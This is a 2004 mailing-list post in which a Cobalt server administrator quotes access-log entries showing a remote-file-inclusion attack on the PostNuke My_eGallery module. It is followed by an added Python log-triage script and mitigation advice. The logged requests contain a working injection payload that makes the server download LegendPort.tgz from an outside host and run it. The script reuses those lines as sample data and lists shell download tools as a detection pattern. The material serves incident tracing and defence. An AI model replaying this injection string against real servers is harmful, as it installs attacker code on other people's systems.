RE: [cobalt-users] Howto trace hack
- Subject: RE: [cobalt-users] Howto trace hack
- From: "Crocket" <crocket@xxxxxxxxxxx>
- Date: Fri Mar 19 08:54:01 2004
- List-id: Mailing list for users to share thoughts on Sun Cobalt products. <cobalt-users.list.cobalt.com>
Hi,
The kiddies are trying it again, and now I managed to identify them and how
they do it:
They use the Postnuke My_eGallery module to execute the crap from their
site.
www.domain.com 80.96.33.10 - - [19/Mar/2004:12:43:19 +0100] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.mirabela.net/inject.txt?&cmd=cd%20/tmp;wget%20www.mirabela.net/LegendPort.tgz;tar%20-zxvf%20LegendPort.tgz;cd%20LegendPort;./start/modules/My_eGallery/public/displayCategory.php?%20basepath=http://www.mirabela.net/inject.txt?&cmd=cd%20/tmp;wget%20www.mirabela.net/LegendPort.tgz;tar%20-zxvf%20LegendPort.tgz;cd%20LegendPort;./start HTTP/1.0" 404 1227 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
www.domain.com 80.96.33.10 - - [19/Mar/2004:12:43:19 +0100] "GET /libImage/warning.gif HTTP/1.0" 200 871 "http://xxx.xxx.xxx.xxx/modules/My_eGallery/public/displayCategory.php?basepath=http://www.mirabela.net/inject.txt?&cmd=cd%20/tmp;wget%20www.mirabela.net/LegendPort.tgz;tar%20-zxvf%20LegendPort.tgz;cd%20LegendPort;./start/modules/My_eGallery/public/displayCategory.php?%20basepath=http://www.mirabela.net/inject.txt?&cmd=cd%20/tmp;wget%20www.mirabela.net/LegendPort.tgz;tar%20-zxvf%20LegendPort.tgz;cd%20LegendPort;./start" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
www.domain.com 62.162.59.75 - - [19/Mar/2004:15:53:19 +0100] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.aleksrulz.com/hack.txt?&cmd=cd%20/tmp;wget%20mirabela.net/LegendPort.tgz;tar%20zxvf%20LegendPort.tgz;cd%20LegendPort;./start HTTP/1.1" 200 2861 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
I replaced my domain with www.domain.com and my IP with xxx.xxx.xxx.xxx.
They are forcing the basepath, which is probably a global in that module.
So they aren't even using a PHP upload form.
Anyone know a quick fix to unset that global?
If not I will remove those modules from the sites and warn my customers.
John
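As an added example (not part of the post, and not code from PostNuke or the My_eGallery module), the log entries above can be triaged automatically. The Python below parses vhost-prefixed Apache combined-format lines, percent-decodes every query parameter, and flags a parameter whose value is a remote URL (the forced basepath, i.e. a remote include) or that carries a shell command chain (the cmd= payload), looking at both the request line and the Referer. It then lists the requesting IPs and the hosts the payload pulls from. The embedded log lines are constructed from the entries quoted in the post (request lines rejoined, the redacted www.domain.com and xxx.xxx.xxx.xxx kept, plus one benign request for contrast); the log-format regex and the list of shell tools it searches for are assumptions.

```python
"""Triage Apache access-log lines for the remote-include / command-injection
pattern: a query parameter set to a remote URL plus a cmd= shell payload."""
import re
import urllib.parse
from collections import namedtuple

# Constructed sample, modelled on the entries quoted in the post (vhost-prefixed
# combined log format, request lines rejoined onto single lines, redacted
# values kept). The last line is a benign request added for contrast.
SAMPLE_LOG = """\
www.domain.com 80.96.33.10 - - [19/Mar/2004:12:43:19 +0100] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.mirabela.net/inject.txt?&cmd=cd%20/tmp;wget%20www.mirabela.net/LegendPort.tgz;tar%20-zxvf%20LegendPort.tgz;cd%20LegendPort;./start HTTP/1.0" 404 1227 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
www.domain.com 80.96.33.10 - - [19/Mar/2004:12:43:19 +0100] "GET /libImage/warning.gif HTTP/1.0" 200 871 "http://xxx.xxx.xxx.xxx/modules/My_eGallery/public/displayCategory.php?basepath=http://www.mirabela.net/inject.txt?&cmd=cd%20/tmp;wget%20www.mirabela.net/LegendPort.tgz" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"
www.domain.com 62.162.59.75 - - [19/Mar/2004:15:53:19 +0100] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.aleksrulz.com/hack.txt?&cmd=cd%20/tmp;wget%20mirabela.net/LegendPort.tgz;tar%20zxvf%20LegendPort.tgz;cd%20LegendPort;./start HTTP/1.1" 200 2861 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
www.domain.com 10.0.0.5 - - [19/Mar/2004:16:01:02 +0100] "GET /modules/My_eGallery/public/displayCategory.php?basepath=modules/My_eGallery/&cid=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Assumed log layout: %v %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
REMOTE_URL = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)
# Download-and-run tooling to look for inside a parameter value (assumed list).
SHELL_TOOLS = re.compile(r"\b(?:wget|curl|fetch|lynx|tar|chmod|perl|nc)\b")
DOWNLOAD_ARG = re.compile(r"\b(?:wget|curl)\s+([^\s;|&]+)")

Finding = namedtuple("Finding", "ip time status where param value reasons")


def parse_line(line):
    """Return the log fields as a dict, or None if the line does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def parse_query(query):
    """Split a query string on '&' only and percent-decode both sides.
    Deliberately not parse_qsl: older Pythons also split on ';', which
    would shred the cmd= payload."""
    pairs = []
    for chunk in query.split("&"):
        if chunk:
            key, _, value = chunk.partition("=")
            pairs.append((urllib.parse.unquote_plus(key),
                          urllib.parse.unquote_plus(value)))
    return pairs


def inspect_target(target):
    """(param, decoded value, reasons) for every suspicious parameter in a URL."""
    hits = []
    for key, value in parse_query(urllib.parse.urlsplit(target).query):
        reasons = []
        if REMOTE_URL.match(value):
            reasons.append("remote URL passed as parameter value (remote include)")
        if key.lower() == "cmd" or (";" in value and SHELL_TOOLS.search(value)):
            reasons.append("shell command chain in parameter value")
        if reasons:
            hits.append((key, value, reasons))
    return hits


def scan_log(text):
    """Run inspect_target over the request line and the Referer of each entry."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        for where, url in (("request", entry["target"]), ("referer", entry["referer"])):
            for key, value, reasons in inspect_target(url):
                findings.append(Finding(entry["ip"], entry["time"], int(entry["status"]),
                                        where, key, value, reasons))
    return findings


def attacker_ips(findings):
    """Distinct source addresses behind the flagged entries."""
    return sorted({f.ip for f in findings})


def extract_iocs(findings):
    """Hosts named in remote-include URLs and as wget/curl download sources."""
    hosts = set()
    for f in findings:
        if REMOTE_URL.match(f.value):
            hosts.add(urllib.parse.urlsplit(f.value.strip()).hostname)
        for url in DOWNLOAD_ARG.findall(f.value):
            if "://" not in url:
                url = "http://" + url  # wget accepts a bare host/path
            hosts.add(urllib.parse.urlsplit(url).hostname)
    return sorted(h for h in hosts if h)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f.ip} {f.time} {f.status} {f.where}:{f.param}= {f.value!r} -> {'; '.join(f.reasons)}")
    print("attacker IPs:", attacker_ips(found))
    print("remote hosts:", extract_iocs(found))
```

Two details in the findings matter when tracing: the status code, since a 200 on the displayCategory.php request means the script served it, and the Referer on the follow-up warning.gif fetch, which repeats the whole payload and so records the attack even if the primary request line is mangled or landed in another vhost's log. On the quick fix the post asks about: a request-supplied basepath only becomes a PHP variable with register_globals on, and include of an http:// URL only works with allow_url_fopen on, so turning both off in php.ini removes the precondition for this injection without editing the module; it does not make the module itself correct, so removing it remains the conservative option.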